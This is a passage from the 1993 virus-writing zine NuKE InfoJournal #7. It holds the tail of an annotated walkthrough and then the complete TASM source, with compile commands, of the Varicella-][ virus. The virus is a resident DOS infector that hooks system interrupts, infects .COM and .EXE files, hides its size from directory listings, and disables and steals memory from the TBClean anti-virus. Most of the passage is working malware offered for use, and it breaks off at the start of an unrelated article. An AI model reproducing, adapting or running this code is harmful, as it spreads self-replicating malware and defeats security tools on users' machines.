cs:[int1c+2][bp],es ;save int1c segment les si,dword ptr ds:[004ch] ;get int13 vector mov word ptr cs:[int13][bp],si ;save int13 offset mov word ptr cs:[int13+2][bp],es ;save int13 segment pop ds mov byte ptr cs:[mcb][bp],00h ;reset the TB mcb flag mov ax,0abcdh ;test if virus is here? int 13h cmp bx,0abcdh ;is it? jne install_virus ;jmp, if not & install leave_mcb: jmp exit_mem ;yes, leave then [This is the tricky part! Remember TBClean occupies ALL available memory! So I had to come up with a routine that would work when TBClean was NOT in memory, and when it was! The task was hard...but I did it (naturally, hehe). TBClean *NOT* in memory: If TBClean is not in memory, then we start at location "install_virus" and we get the List of Lists, and we get the FIRST MCB chain and basically we chain through until we find the END of the MCB chain, which ends with a "Z" instead of an "M". Once we find the last chain we subtract the virus size in paragraphs, and that's it... TBClean in memory: If TBClean is in memory when the virus finds the LAST MCB block and tries to subtract its size from it, it will notice that not enough memory is available. Where then will jump to "steal_some." What "steal_some" does is it will REPEAT the process again. Meaning it will now get the FIRST MCB chain, and chain through the end, but while its chaining through the MCB, it will look for the MCB that belongs to TBClean!!! Once we find the MCB that belongs to TBClean we will subtract the virus size in paragraphs from it and voila -- we stole and allocated memory while bypassing TBClean!!! And now we can safely return to TBClean without worrying if it will de-allocate our memory space.] ;--------- Going Resident ------ steal_some: mov al,byte ptr cs:[mcb][bp] ;if tb is here, steal cmp al,0ffh ;memory from it! je leave_mcb ;error? exit then inc byte ptr cs:[mcb][bp] ;inc flag cmp al,01 ; ja mcb3_1 install_virus: mov ah,52h ;get the list of lists int 21h ;use dos mov ax,es:[bx-2] ;get first mcb chain mov es,ax ;es=segment of 1st mcb mcb1: cmp byte ptr es:[0000h],'Z' ;is it the last mcb jne mcb2 ;jmp if not clc ;yes last mcb, CLC jmp short mcbx ;outta here mcb2: cmp byte ptr es:[0000h],'M' ;is it in the chain je mcb3 ;jmp if yes stc ;error, set carry flag jmp short mcbx ;outta here [The bellow block is special! Meaning if the TB flag is on, we will compare ALL of the MCB block owners to find the one that belongs to TBClean! Since we already know the segment of TBClean, we subtract 100h (256) bytes and we have its PSP area. Since DS = segment - 1, we will do DS = segment - 9, since we already subtracted 1 from the beginning!] mcb3: cmp byte ptr cs:[mcb][bp],0 ;is TB flag off? je mcb3_1 ;if yes, then jmp mov dx,ds ;else cmp TB ds sub dx,9h ;ds-10 cmp word ptr es:[0001h],dx ;cmp to mcb owner. je mcbx_1 mcb3_1: mov ax,es ;ax=es add ax,word ptr es:[0003h] ;ax=es + next mcb inc ax ;get mcb mov es,ax ;es=ax:next mcb chain jmp short mcb1 ;goto first step mcbx: jc leave_mcb ;if error, exit mcbx_1: cmp word ptr es:[0003],(virus_size/16) + 11h jb steal_some mov byte ptr es:[0000],'Z' ;the last mcb chain! sub word ptr es:[0003],(virus_size/16) + 11h add ax,word ptr es:[0003h] ;figure out segment inc ax ;add 16 bytes mov es,ax ;new segment in es mov di,103h ;offset is 103h [Now we have some memory! Let's move a copy of the virus into that newly allocated memory under the TOM!] push ds ;save TB ds location push cs pop ds ;virus cs=ds mov si,offset init_virus ;si=top of virus add si,bp ;add delta mov cx,virus_size ;move virus_size cld ;clear direction flag repne movsb ;do it Mr. Crunge [Now we will hook the DOS Vector table (0000:0000->0000:0200).] mov ds,cx ;ds=0000 hook_again: cli ;disable ints mov word ptr ds:[0084h],offset int21_handler ;hook int21 mov word ptr ds:[0086h],es mov word ptr ds:[0070h],offset int1c_handler ;hook int1c mov word ptr ds:[0072h],es mov word ptr ds:[004ch],offset int13_handler ;hook int13 mov word ptr ds:[004eh],es sti ;enable ints [We will test if the TBClean flag is on! If TBClean flag is on, we will make DS = "segment of 2nd copy of vector table in TCLEAN" and hook it!] cmp byte ptr cs:[tb_here][bp],00h ;was TB found? je go_on ;no, then jmp cmp cl,01h ;is this the 2nd x here? je go_on ;yes, then jmp mov ds,word ptr cs:[tb_int2][bp] ;get TB int segment inc cl ;inc cl jmp short hook_again ;hook ints again [If TBClean was found the bellow block will now hook the last copy of the vector table that TBClean did...] go_on: pop ds ;get TB code segment cmp byte ptr cs:[tb_here][bp],01h ;TB here? je hook_tb_ints ;yes, then jmp jmp exit_mem ;else exit hook_tb_ints: mov si,word ptr cs:[tb_ints][bp] ;get TB int offset mov word ptr ds:[si+84h+16],offset int21_handler mov word ptr ds:[si+86h+16],es mov word ptr ds:[si+70h+16],offset int1c_handler mov word ptr ds:[si+72h+16],es mov word ptr ds:[si+4ch+16],offset int13_handler mov word ptr ds:[si+4eh+16],es [ALL DONE!!! Now we restore to the original file! So how does it feel to fool TBClean??? Article #11 contains the complete source code of the Varicella-][ virus. You may test it as you wish!] exit_mem: pop ds pop es pop si cmp word ptr cs:[buffer][bp],5A4Dh ;.exe file? je exit_exe_file ;yupe exit exe file cmp word ptr cs:[buffer][bp],4D5Ah ;.exe file? je exit_exe_file ;yupe exit exe file push cs pop ds mov bx,offset buffer ;get first 3 bytes add bx,bp ;fix delta mov ax,[bx] ;move first 2 bytes mov word ptr ds:[100h],ax ;put em in the beginning inc bx ;inc pointer inc bx mov al,[bx] ;get last of 3rd byte mov byte ptr ds:[102h],al ;put that in place pop dx pop cx pop bx pop word ptr cs:[ax_reg][bp] ;save ax else where mov ax,100h push ax ;fake a CALL & RETN mov ax,word ptr cs:[ax_reg][bp] ;put ax as normal retn ;link to 100h exit_exe_file: mov dx,ds ;get psp=ds seg add dx,10h ;add 16bytes to seg pop word ptr cs:[ax_reg][bp] pop cx pop bx pop ax add word ptr cs:[buffer+22][bp],dx ;fix segments add dx,word ptr cs:[buffer+14][bp] cli mov ss,dx ;restore ss mov sp,word ptr cs:[buffer+16][bp] ;and sp sti mov dx,word ptr cs:[ax_reg][bp] jmp dword ptr cs:[buffer+20][bp] ;jmp to entry pt. Rock Steady/NuKE =============================================================================== ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "Varicella-][ Virus Eats Up Thunderbyte's TBClean" Nu Nu KE KE By -N -N uK uK Rock Steady E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 % Varicella-][ Virus Eats Up Thunderbyte's TBClean % This is the complete virus source code for the Varcella-][ virus that can bypass TBClean v6.04. This virus is for research only. It is a very advanced stealth virus -- it can disinfect on the fly and hide its length quite well. If you have any feedback, please write to me about it on your closest NuKENet BBS. I'm glad to be of any help. Or if you wish for NuKE to test any other anti-virus package, please tell us. The InfoJournals are for you. Rock Steady/NuKE ------------------------------- CUT HERE --------------------------------------- ;=============================================================================== ; ; (c) 1993 by NuKE Software Publishing, Inc. ; Developed by Rock Steady/NuKE ; ; ; ; To Compile : TASM VARCELLA; ; TLINK/T VARCELLA; ; virus_size equ last - init_virus ;virus size (bytes) seg_a segment byte public assume cs:seg_a,ds:seg_a org 100h ;compile to .com start: jmp init_virus ;------------------------------------------------------------------------------- init_virus: call doit_now ;begin virus doit_now: pop bp ;pop call offset sub bp,offset doit_now ;fix it with pointer push ax push bx ;save the registers push cx push dx push si push es push ds mov byte ptr cs:[tb_here][bp],00h ;Reset TB flag xor dx,dx ;dx=0 mov ds,dx ;ds=0 mov ax,word ptr ds:[0006h] ;ax=0000:0006 segment of dec ax mov ds,ax mov cx,0FFFFh ;cx=64k mov si,dx ;si=0 look_4_tbclean: mov ax,word ptr ds:[si] xor ax,0A5F3h je check_it ;jmp if its TBClean look_again: inc si ;if not continue looking loop look_4_tbclean jmp not_found ;not found cont normal check_it: mov ax,word ptr ds:[si+4] xor ax,0006h jne look_again ;jmp =! tbclean mov ax,word ptr ds:[si+10] xor ax,020Eh jne look_again ;jmp =! tbclean mov ax,word ptr ds:[si+12] xor ax,0C700h jne look_again ;jmp =! tbclean mov ax,word ptr ds:[si+14] xor ax,0406h jne look_again ;jmp =! tbclean mov bx,word ptr ds:[si+17] ;steal REAL int 1 offset mov byte ptr ds:[bx+16],0CFh ;replace with IRET mov bx,word ptr ds:[si+27] ;steal REAL int 3 offset mov byte ptr ds:[bx+16],0CFh ;replece with IRET mov byte ptr cs:[tb_here][bp],01h ;set the TB flag on mov bx,word ptr ds:[si+51h] ;get 2nd segment of ints mov word ptr cs:[tb_int2][bp],bx ;vector table mov bx,word ptr ds:[si-5] ;get offset of 1st copy mov word ptr cs:[tb_ints][bp],bx ;of vector table not_found: xor dx,dx push ds mov ds,dx ;put that in ds les si,dword ptr ds:[0084h] ;get int21 vector mov word ptr cs:[int21][bp],si ;save int21 offset mov word ptr cs:[int21+2][bp],es ;save int21 segment les si,dword ptr ds:[0070h] ;get int1c vector mov word ptr cs:[int1c][bp],si ;save int1c offset mov word ptr cs:[int1c+2][bp],es ;save int1c segment les si,dword ptr ds:[004ch] ;get int13 vector mov word ptr cs:[int13][bp],si ;save int13 offset mov word ptr cs:[int13+2][bp],es ;save int13 segment pop ds mov byte ptr cs:[mcb][bp],00h ;reset the TB mcb flag mov ax,0abcdh ;test if virus is here? int 13h cmp bx,0abcdh ;is it? jne install_virus ;jmp, if not & install leave_mcb: jmp exit_mem ;yes, leave then ;--------- Going Resident ------ steal_some: mov al,byte ptr cs:[mcb][bp] ;if tb is here, steal cmp al,0ffh ;memory from it! je leave_mcb ;error? exit then inc byte ptr cs:[mcb][bp] ;inc flag cmp al,01 ; ja mcb3_1 install_virus: mov ah,52h ;get the list of lists int 21h ;use dos mov ax,es:[bx-2] ;get first mcb chain mov es,ax ;es=segment of 1st mcb mcb1: cmp byte ptr es:[0000h],'Z' ;is it the last mcb jne mcb2 ;jmp if not clc ;yes last mcb, CLC jmp short mcbx ;outta here mcb2: cmp byte ptr es:[0000h],'M' ;is it in the chain je mcb3 ;jmp if yes stc ;error, set carry flag jmp short mcbx ;outta here mcb3: cmp byte ptr cs:[mcb][bp],0 ;is TB flag off? je mcb3_1 ;if yes, then jmp mov dx,ds ;else cmp TB ds sub dx,9h ;ds-10 cmp word ptr es:[0001h],dx ;cmp to mcb owner. je mcbx_1 mcb3_1: mov ax,es ;ax=es add ax,word ptr es:[0003h] ;ax=es + next mcb inc ax ;get mcb mov es,ax ;es=ax:next mcb chain jmp short mcb1 ;goto first step mcbx: jc leave_mcb ;if error, exit mcbx_1: cmp word ptr es:[0003],(virus_size/16) + 11h jb steal_some mov byte ptr es:[0000],'Z' ;the last mcb chain! sub word ptr es:[0003],(virus_size/16) + 11h add ax,word ptr es:[0003h] ;figure out segment inc ax ;add 16 bytes mov es,ax ;new segment in es mov di,103h ;offset is 103h push ds ;save TB ds location push cs pop ds ;virus cs=ds mov si,offset init_virus ;si=top of virus add si,bp ;add delta mov cx,virus_size ;move virus_size cld ;clear direction flag repne movsb ;do it Mr. Crunge mov ds,cx ;ds=0000 hook_again: cli ;disable ints mov word ptr ds:[0084h],offset int21_handler ;hook int21 mov word ptr ds:[0086h],es mov word ptr ds:[0070h],offset int1c_handler ;hook int1c mov word ptr ds:[0072h],es mov word ptr ds:[004ch],offset int13_handler ;hook int13 mov word ptr ds:[004eh],es sti ;enable ints cmp byte ptr cs:[tb_here][bp],00h ;was TB found? je go_on ;no, then jmp cmp cl,01h ;is this the 2nd x here? je go_on ;yes, then jmp mov ds,word ptr cs:[tb_int2][bp] ;get TB int segment inc cl ;inc cl jmp short hook_again ;hook ints again go_on: pop ds ;get TB code segment cmp byte ptr cs:[tb_here][bp],01h ;TB here? je hook_tb_ints ;yes, then jmp jmp exit_mem ;else exit hook_tb_ints: mov si,word ptr cs:[tb_ints][bp] ;get TB int offset mov word ptr ds:[si+84h+16],offset int21_handler mov word ptr ds:[si+86h+16],es mov word ptr ds:[si+70h+16],offset int1c_handler mov word ptr ds:[si+72h+16],es mov word ptr ds:[si+4ch+16],offset int13_handler mov word ptr ds:[si+4eh+16],es exit_mem: pop ds pop es pop si cmp word ptr cs:[buffer][bp],5A4Dh ;.exe file? je exit_exe_file ;yupe exit exe file cmp word ptr cs:[buffer][bp],4D5Ah ;.exe file? je exit_exe_file ;yupe exit exe file push cs pop ds mov bx,offset buffer ;get first 3 bytes add bx,bp ;fix delta mov ax,[bx] ;move first 2 bytes mov word ptr ds:[100h],ax ;put em in the beginning inc bx ;inc pointer inc bx mov al,[bx] ;get last of 3rd byte mov byte ptr ds:[102h],al ;put that in place pop dx pop cx pop bx pop word ptr cs:[ax_reg][bp] ;save ax else where mov ax,100h push ax ;fake a CALL & RETN mov ax,word ptr cs:[ax_reg][bp] ;put ax as normal retn ;link to 100h exit_exe_file: mov dx,ds ;get psp=ds seg add dx,10h ;add 16bytes to seg pop word ptr cs:[ax_reg][bp] pop cx pop bx pop ax add word ptr cs:[buffer+22][bp],dx ;fix segments add dx,word ptr cs:[buffer+14][bp] cli mov ss,dx ;restore ss mov sp,word ptr cs:[buffer+16][bp] ;and sp sti mov dx,word ptr cs:[ax_reg][bp] jmp dword ptr cs:[buffer+20][bp] ;jmp to entry pt. mcb db 0 ax_reg dd 0 int13 dd 0 int1c dd 0 int21 dd 0 tb_ints dd 0 tb_here db 0 tb_int2 dd 0 ;=============================================================================== ; Int 13h Handler ;=============================================================================== int13_handler: cmp ax,0abcdh ;virus test je int13_test ;yupe int13call: jmp dword ptr cs:[int13] ;original int13 int13_test: mov bx,ax ;fix iret ;=============================================================================== ; Int 1Ch Handler ;=============================================================================== int1c_handler: iret ;------------------------------------------------------------------------------- ; FCB Dir Stealth Routine (File Find) ;------------------------------------------------------------------------------- fcb_dir: call calldos21 ;get the fcb block test al,al ;test for error jnz fcb_out ;jmp if error push ax ;save registers push bx push cx push es mov ah,51h ;get current psp call calldos21 ;call int21 mov es,bx ;es=segment of psp cmp bx,es:[16h] ;psp of command.com? jnz fcb_out1 ;no, then jmp mov bx,dx ;ds:bx=fcb mov al,[bx] ;1st byte of fcb push ax ;save it mov ah,2fh ;get dta call calldos21 ;es:bx <- dta pop ax ;get first byte inc al ;al=ffh therefor al=ZR jnz fcb_old ;if != ZR jmp add bx,7h ;extended fcb here, +7 fcb_old: mov ax,es:[bx+17h] ;get file time stamp mov cx,es:[bx+19h] ;get file date stamp and ax,1fh ;unmask seconds field and cx,1fh ;unmask day of month xor ax,cx ;are they equal? jnz fcb_out1 ;nope, exit then sub word ptr es:[bx+1dh],virus_size ;sub away virus_size sbb word ptr es:[bx+1fh],0 ;sub with carry flag fcb_out1: pop es ;restore registers pop cx pop bx pop ax fcb_out: iret ;return control ;------------------------------------------------------------------------------- ; ASCIIZ Dir Stealth Routine (File Find) ;------------------------------------------------------------------------------- dta_dir: call calldos21 ;get results to dta jb dta_out ;if error, split push ax ;save register push bx push cx push es mov ah,2fh ;get current dta call calldos21 ;es:bx <- dta mov ax,es:[bx+16h] ;get file time stamp mov cx,es:[bx+18h] ;get file date stamp and ax,1fh ;unmask seconds field and cx,1fh ;unmask day of month xor ax,cx ;are they equal jnz dta_out1 ;nope, exit then sub word ptr es:[bx+1ah],virus_size ;sub away virus_size sbb word ptr es:[bx+1ch],0 ;sub with carry flag dta_out1: pop es ;restore registers pop cx pop bx pop ax dta_out: retf 0002h ;pop 2 words of stack ;=============================================================================== ; Int 21h Handler ;=============================================================================== int21_handler: cmp ah,11h ;FCB find first match je old_dir cmp ah,12h ;FCB find next match je old_dir cmp ah,4eh ;Find first match je new_dir cmp ah,4fh ;Find next match je new_dir cmp ah,3dh ;Opening a file je file_open cmp ah,6ch ;Ext_opening a file je file_ext_open cmp ah,3eh ;closing a file je file_close cmp ah,4bh ;Execution of a file je file_execute int21call: jmp dword ptr cs:[int21] ;original int21 old_dir: jmp fcb_dir ;fcb file find new_dir: jmp dta_dir ;new asciiz file find file_open: jmp open_file ;disinfect opening file file_ext_open: jmp open_ext_file ;disinfect opening file file_close: jmp close_file ;infect closing file file_execute: call check_extension ;check for ok ext cmp byte ptr cs:[com_ext],1 ;is it a com? je exec_disinfect ;yupe disinfect it cmp byte ptr cs:[exe_ext],1 ;is it a exe? je exec_disinfect ;yupe disinfect it jmp SHORT int21call exec_disinfect: call exec_disinfect1 ;Disinfect file mov word ptr cs:[ax_reg],dx pushf ;fake an int call dword ptr cs:[int21] ;call dos xchg word ptr cs:[ax_reg],dx ;restore dx mov byte ptr cs:[close],0 ;reset flag.. push ax ;store 'em push bx push cx push dx push si push di push es push ds closing_infect: mov ax,3524h ;get error handler call calldos21 ;call dos push es ;save es:bx= int_24 push bx ;error handler push ds ;ds:dx= asciiz string push dx push cs ;cs=ds pop ds mov dx,offset int21_handler ;hook error handler mov ax,2524h ;with our int24h call calldos21 pop dx ;restore ds:dx asciiz pop ds ;string cmp byte ptr cs:[close],0 ;Are we closing file? je exec_get_att ;nope, then jmp mov ax,word ptr cs:[handle] ;yupe, ax=file handle jmp exec_open_ok ;jmp so you don't open ;the file twice... exec_get_att: mov ax,4300h ;get file attribs call calldos21 ;call dos jnc exec_attrib ;no, error jmp jmp exec_exit2 ;ERROR - split exec_attrib: mov byte ptr cs:[attrib],cl test cl,1 ;check bit 0 (read_only) jz exec_attrib_ok ;if bit0=0 jmp dec cx ;else turn of bit_0 mov ax,4301h ;write new attribs call calldos21 ;call dos exec_attrib_ok: mov ax,3d02h ;open file for r/w call calldos21 ;call dos jnc exec_open_ok ;ok, no error jmp jmp exec_exit2 ;ERROR - split exec_open_ok: xchg bx,ax ;bx=file handler push cs ;cs=ds pop ds mov ax,5700h ;get file time/date call calldos21 ;call dos mov word ptr cs:[old_time],cx ;save file time mov word ptr cs:[org_time],cx mov word ptr cs:[old_date],dx ;save file date and cx,1fh ;unmask second field and dx,1fh ;unmask date field xor cx,dx ;are they equal? jnz exec_time_ok ;nope, file not infected jmp exec_exit3 ;FILE INFECTED exec_time_ok: and word ptr cs:[old_time],0ffe0h ;reset second bits or word ptr cs:[old_time],dx ;seconds=day of month mov ax,4200h ;reset ptr to beginning xor cx,cx ;(as opened files may xor dx,dx ; have ptr anywhere, call calldos21 ; so be smart!) mov word ptr cs:[marker],0DBDBh ;File Infection marker mov dx,offset ds:[buffer] ;ds:dx buffer mov cx,18h ;read 18h bytes mov ah,3fh ;read from handle call calldos21 ;call dos jc exec_exit1 ;error? if yes jmp sub cx,ax ;did we read 18h bytes? jnz exec_exit1 ;if no exit mov dx,cx ;cx=0 dx=0 mov ax,4202h ;jmp to EOF call calldos21 ;call dos jc exec_exit1 ;error? exit if so. mov word ptr cs:[filesize+2],ax ;save lower 16bit fileSz mov word ptr cs:[filesize],dx ;save upper 16bit fileSz call chkbuf ;check if .exe jz exec_cool ;jmp if .exe file cmp ax,0FFF0h - virus_size ;64k-256-virus < 64k? jb exec_cool ;if less jmp! exec_exit1: jmp exec_exit3 ;exit! ;_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- ; Mutate and infect ;-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ exec_cool: mov dx,offset init_virus ;ds:dx=virus beginning mov cx,virus_size ;cx=virus size mov ah,40h ;write to handle call calldos21 ;call dos jc exec_exit1 ;error? if yes exit sub cx,ax ;cx=ax bytes? jnz exec_exit1 ;not equal exit mov dx,cx ;cx=0 dx=0 mov ax,4200h ;jmp to top of file call calldos21 ;call dos jc exec_exit1 ;error, then exit mov ax,word ptr cs:[filesize+2] ;ax=lower 16bit fileSize call chkbuf ;check if .exe jnz exec_com_file ;if !=.exe jmp mov dx,word ptr cs:[filesize] ;get upper 16bit mov cx,4 ;cx=0004 mov si,word ptr cs:[buffer+8] ;get exe header size shl si,cl ;mul by 16 sub ax,si ;exe_header - filesize sbb dx,0h ;sub with carry mov cx,10h ;cx=0010 div cx ;ax=length in para ;dx=remaider mov word ptr cs:[buffer+20],dx ;New IP offset address mov word ptr cs:[buffer+22],ax ;New CS (In paragraphs) add dx,virus_size+100h ;Dx=virus_size+256 mov word ptr cs:[buffer+16],dx ;New SP entry mov word ptr cs:[buffer+14],ax ;New SS (in para) add word ptr cs:[buffer+10],(virus_size)/16+1 ;min para mov ax,word ptr cs:[buffer+10] ;ax=min para needed cmp ax,word ptr cs:[buffer+12] ;cmp with max para jb exec_size_ok ;jmp if ok! mov word ptr cs:[buffer+12],ax ;nop, enter new max exec_size_ok: mov ax,word ptr cs:[buffer+2] ;ax=file size add ax,virus_size ;add virus to it push ax ;push it and ah,1 ; mov word ptr cs:[buffer+2],ax ;restore new value pop ax ;pop ax mov cl,9 ; shr ax,cl ; add word ptr cs:[buffer+4],ax ;enter fileSz + header mov dx,offset buffer ;ds:dx=new exe header mov cx,18h ;cx=18h bytes to write jmp SHORT exec_write_it ;jmp... exec_com_file: sub ax,3 ;sub 3 for jmp address mov word ptr cs:[buffer+1],ax ;store new jmp value mov byte ptr cs:[buffer],0E9h ;E9h=JMP mov dx,offset buffer ;ds:dx=buffer mov cx,3 ;cx=3 bytes exec_write_it: mov ah,40h ;write to file handle call calldos21 ;call dos mov dx,word ptr cs:[old_date] ;restore old date mov cx,word ptr cs:[old_time] ;restore old time mov ax,5701h ;write back to file call calldos21 ;call dos exec_exit3: mov ah,3eh ;close file call calldos21 ;call dos exec_exit2: pop dx ;restore es:bx (the pop ds ;original int_24) mov ax,2524h ;put back to place call calldos21 ;call dos pop ds pop es pop di ;pop registers pop si pop dx xor cx,cx mov cl,byte ptr cs:[attrib] ;get old file attrib mov ax,4301h ;put them back call calldos21 ;call dos pop cx pop bx pop ax cmp byte ptr cs:[close],0 ;get called by exec? je exec_good_bye ;yep, then jmp iret ;else exit now. exec_good_bye: mov dx,word ptr cs:[ax_reg] ;restore dx iret ;iret ;------------------------------------------------------------------------------- ; Close File Int21h/ah=3Eh ;------------------------------------------------------------------------------- close_file: cmp bx,4h ;file handler > 4? ja close_cont ;jmp if above jmp int21call ;else exit close_cont: push ax ;save 'em push bx push cx push dx push si push di push es push ds push bx ;save file handler mov ax,1220h ;get job file table! int 2fh ;call multiplex ;es:di=JFT for handler mov ax,1216h ;get system file table mov bl,es:[di] ;bl=SFT entry int 2fh ;call multiplex pop bx ;save file handler add di,0011h mov byte ptr es:[di-0fh],02h ;set to read/write add di,0017h cmp word ptr es:[di],'OC' ;check for .COM file jne closing_next_try ;no try next ext cmp byte ptr es:[di+2h],'M' ;check last letter je closing_cunt3 ;no, file no good, exit closing_exit: jmp closing_nogood ;exit closing_next_try: cmp word ptr es:[di],'XE' ;check for .EXE file jne closing_exit ;no, exit cmp byte ptr es:[di+2h],'E' ;check last letter jne closing_exit ;no, exit closing_cunt3: mov byte ptr cs:[close],1 ;set closing flag mov word ptr cs:[handle],bx ;save handler jmp closing_infect ;infect file! closing_nogood: pop ds ;restore 'em pop es pop di pop si pop dx pop cx pop bx pop ax jmp int21call ;good bye, baby... ;------------------------------------------------------------------------------- ; Execute Disinfecting routine ;------------------------------------------------------------------------------- exec_disinfect1 PROC push ax ;save registers push bx push cx push dx push ds mov ax,4300h ;get file attribs call calldos21 ;call dos test cl,1h ;is Read-only flag? jz okay_dis ;no, jmp attribs ok dec cx ;turn off bit 0 mov ax,4301h ;write new attribs call calldos21 ;call dos jnc okay_dis ;No error? then jmp jmp end_dis ;error? exit! okay_dis: mov ax,3d02h ;open file for r/w call calldos21 ;call dos jnc dis_fileopen ;No error? then jmp jmp end_dis ;Error? exit! dis_fileopen: xchg bx,ax ;bx=file handle mov ax,5700h ;get file time/date call calldos21 ;call dos mov word ptr cs:[old_time],cx ;save file time mov word ptr cs:[old_date],dx ;save file date and cx,1fh ;unmask second field and dx,1fh ;unmask date field xor cx,dx ;are they equal? jnz half_way ;nope, file not infected mov ax,4202h ;jmp to EOF xor cx,cx ;cx=0 xor dx,dx ;dx=0 call calldos21 ;call dos push cs ;cs=ds pop ds ; mov cx,dx ;dx:ax=file size mov dx,ax ;save to cx:dx push cx ;save upper fileSz push dx ;save lower fileSz sub dx,1Ch ;filesize-1C=origin byte sbb cx,0 ;sub with carry mov ax,4200h ;position ptr call calldos21 ;call dos mov ah,3fh ;open file mov cx,1Ch ;read last 1Ch bytes mov dx,offset org_time ;put in ds:dx call calldos21 ;call dos call chkbuf ;Did it work? je half ;Yes,Jmp cmp word ptr ds:[marker],0DBDBh ;File REALLY Infected? je half ;Yes, then jmp pop dx pop cx half_way: jmp end_dis1 ;exit, error! half: xor cx,cx ;cx=0 xor dx,dx ;dx=0 mov ax,4200h ;pointer to top of file call calldos21 ;call dos mov ah,40h ;write function mov dx,offset buffer ;ds:dx=buffer mov cx,18h ;cx=18h bytes to write call chkbuf ;check if .exe? jz SHORT dis_exe_jmp ;yupe, jmp mov cx,3h ;else write 3 bytes dis_exe_jmp: call calldos21 ;call dos pop dx ;pop original fileSz pop cx sub dx,virus_size ;Sub with virus_size sbb cx,0 ;sub with carry mov ax,4200h ;ptr top of virus call calldos21 ;call dos mov ah,40h ;write function xor cx,cx ;write 0 bytes call calldos21 ;call dos! (new EOF) mov cx,word ptr ds:[org_time] ;get original time mov dx,word ptr ds:[old_date] ;get original date mov ax,5701h ;put back to file call calldos21 ;call dos end_dis1: mov ah,3eh ;close file handle call calldos21 ;call dos end_dis: pop ds ;restore values pop dx pop cx pop bx pop ax ret exec_disinfect1 ENDP ;------------------------------------------------------------------------------- ; Open File by DOS Int21h/ah=6ch ;------------------------------------------------------------------------------- open_ext_file: push dx ;save DX mov dx,si ;asciiz=DS:DX now jmp open_ext ;jmp ;------------------------------------------------------------------------------- ; Open File by DOS Int21h/ah=3Dh ;------------------------------------------------------------------------------- open_file: push dx ;save dx (asciiz) open_ext: call check_extension ;check extension cmp byte ptr cs:[com_ext],1 ;is it a .com? je open_ok_ext ;yep, then jmp cmp byte ptr cs:[exe_ext],1 ;is it a .exe? je open_ok_ext ;yep, them jmp jmp open_exit ;ext no good, exit! open_ok_ext: call exec_disinfect1 ;disinfect file! open_exit: pop dx ;restore dx jmp int21call ;exit to dos... ;------------------------------------------------------------------------------- ; Checks Buffer (EXE) Header ;------------------------------------------------------------------------------- chkbuf PROC push si ;save register mov si,word ptr cs:[buffer] ;get first word cmp si,5A4Dh ;si=ZM? je chkbuf_ok ;if yes exit cmp si,4D5Ah ;si=MZ? chkbuf_ok: pop si ;pop register ret chkbuf ENDP ;------------------------------------------------------------------------------- ; Check file Extension ;------------------------------------------------------------------------------- check_extension PROC pushf ;save flags push cx ;save cx,si push si mov si,dx ;ds:[si]=asciiz mov cx,128 ;scan 128 bytes max mov byte ptr cs:[com_ext],0 ;reset .com flag mov byte ptr cs:[exe_ext],0 ;reset .exe flag check_ext: cmp byte ptr ds:[si],2Eh ;scan for "." je check_ext1 ;jmp if found inc si ;else inc and loop loop check_ext ;loop me check_ext1: inc si ;inc asciiz ptr cmp word ptr ds:[si],'OC' ;is it .COM jne check_ext2 ; ~~ cmp byte ptr ds:[si+2],'M' ;is it .COM je com_file_ext ; ~ check_ext2: cmp word ptr ds:[si],'oc' ;is it .com jne check_ext3 ; ~~ cmp byte ptr ds:[si+2],'m' ;is it .com je com_file_ext ; ~ check_ext3: cmp word ptr ds:[si],'XE' ;is it .EXE jne check_ext4 ; ~~ cmp byte ptr ds:[si+2],'E' ;is it .EXE je exe_file_ext ; ~ check_ext4: cmp word ptr ds:[si],'xe' ;is it .exe jne check_ext_exit ; ~~ cmp byte ptr ds:[si+2],'e' ;is it .exe je exe_file_ext ; ~ jmp check_ext_exit ;neither exit com_file_ext: mov byte ptr cs:[com_ext],1 ;found .com file jmp SHORT check_ext_exit ;jmp short exe_file_ext: mov byte ptr cs:[exe_ext],1 ;found .exe file check_ext_exit: pop si ;restore pop cx popf ;save flags ret com_ext db 0 ;flag on=.com file exe_ext db 0 ;flag on=.exe file check_extension ENDP ;------------------------------------------------------------------------------- ; Original Int21h ;------------------------------------------------------------------------------- calldos21 PROC pushf ;fake int call call dword ptr cs:[int21] ;call original int_21 ret calldos21 ENDP ;=============================================================================== ; Int 24h Handler ;=============================================================================== int24_handler: mov al,3 ;don't report error... iret ;later dude... ;------------------------------------------------------------------------------- ; FLAGS - FLAGS - FLAGS - FLAGS - FLAGS close db 0 ;closing file ;------------------------------------------------------------------------------- ; END - END - END - END - END - END - END rand_val dw 0 flags dw 0 ;Flags are saved here attrib db 0 ;file's attrib filesize dd 0 ;filesize handle dw 0 ;file handler old_date dw 0 ;file date old_time dw 0 ;file time ;------------------------------------------------------------------------------- org_time dw 0 ;original file time ;------------------------------------------------------------------------------- buffer db 0CDh,020h ; 0 (0) EXE file signature db 090h,090h ; 2 (2) Length of file db 090h,090h ; 4 (4) Size of file + header (512k) db 090h,090h ; 6 (6) # of relocation items db 090h,090h ; 8 (8) Size of header (16byte para) db 090h,090h ; A (10) Min para needed (16byte) db 090h,090h ; C (12) Max para needed (16byte) db 090h,090h ; E (14) SS reg from start in para. db 090h,090h ; 10(16) SP reg at entry db 090h,090h ; 12(18) checksum db 090h,090h ; 14(20) IP reg at entry db 090h,090h ; 16(22) CS reg from start in para. Marker db 0DBh,0DBh ; Marks THIS File as INFECTED! last: seg_a ends end start ------------------------------- CUT HERE --------------------------------------- ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "CARO's Undisclosed Meeting Agenda" Nu Nu PART 1 KE KE -N -N By uK uK ARiSToTLE E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 % CARO's Meeting Agenda % By now, most of us have seen this particular document and have either accepted it as factual or shrugged it off as a hoax. Regardless of your viewpoint, there are still a few items of interest, and their implications, that I wanted to address. 